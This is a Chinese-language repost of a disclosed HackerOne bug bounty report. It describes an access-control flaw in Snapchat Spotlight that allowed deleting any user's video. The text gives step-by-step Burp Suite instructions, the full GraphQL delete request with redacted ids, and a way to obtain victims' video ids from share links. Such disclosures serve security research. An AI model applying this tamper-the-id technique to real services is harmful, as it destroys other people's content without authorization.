实战 | 记一次15000美金的越权删除漏洞

admin 2023年3月7日14:17:22评论17 views字数 797阅读2分39秒阅读模式

Snapchat 有一个名为聚光灯的病毒视频功能,这是最大的趋势,增加了数百万的 snapchat 用户和利润。我找到了一种远程删除任何人的聚光灯的视频方法。

漏洞挖掘步骤

  1. 首先转到https://my.snapchat.com/myposts并在那里登录。

  2. 你会看到你的帖子。

  3. 现在打开 burp suite 并拦截。


  4. 选择您的任何帖子并单击删除选项。

  5. 现在捕获删除请求。在删除请求中有参数id

  6. 您只需更改此 id 参数。您可以轻松获取 id 参数。现在将 id 替换为其他人的视频 id 后转发请求。

{"operationName":"DeleteStorySnaps","variables":{"ids": ["███████"] ,"storyType":"SPOTLIGHT_STORY"},"query":"mutation DeleteStorySnaps($ids: [String!] !, $storyType: StoryType!) {n deleteStorySnaps(ids: $ids, storyType: $storyType)n}n"}

其他用户的视频将被删除。

如何获取 ID 参数

每当您分享 Spotlight 时,您都可以在 url 中看到参数:

https: //story.snapchat.com/spotlight/█████


漏洞影响:

删除任何人的内容聚焦。想象一下删除视频最大的影响者和内容创作者。

获得赏金:

实战 | 记一次15000美金的越权删除漏洞

实战 | 记一次15000美金的越权删除漏洞

原文地址:https://hackerone.com/reports/1819832

实战 | 记一次15000美金的越权删除漏洞


推荐阅读


实战 | 记一次渗透拿下某儿童色情网站的经过


实战 | 某某街一处XSS的绕过思路


实战 | 记一次企业钓鱼演练


干货 | 2022年超全的安全知识库


实战 | 实战一次完整的BC网站渗透测试


星球部分精华内容推荐


实战 | 记一次15000美金的越权删除漏洞


实战 | 记一次15000美金的越权删除漏洞


实战 | 记一次15000美金的越权删除漏洞

其他更多精彩内容,欢迎加入我们的星球

实战 | 记一次15000美金的越权删除漏洞

原文始发于微信公众号(HACK学习君):实战 | 记一次15000美金的越权删除漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年3月7日14:17:22
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   实战 | 记一次15000美金的越权删除漏洞https://cn-sec.com/archives/1591763.html

发表评论

匿名网友 填写信息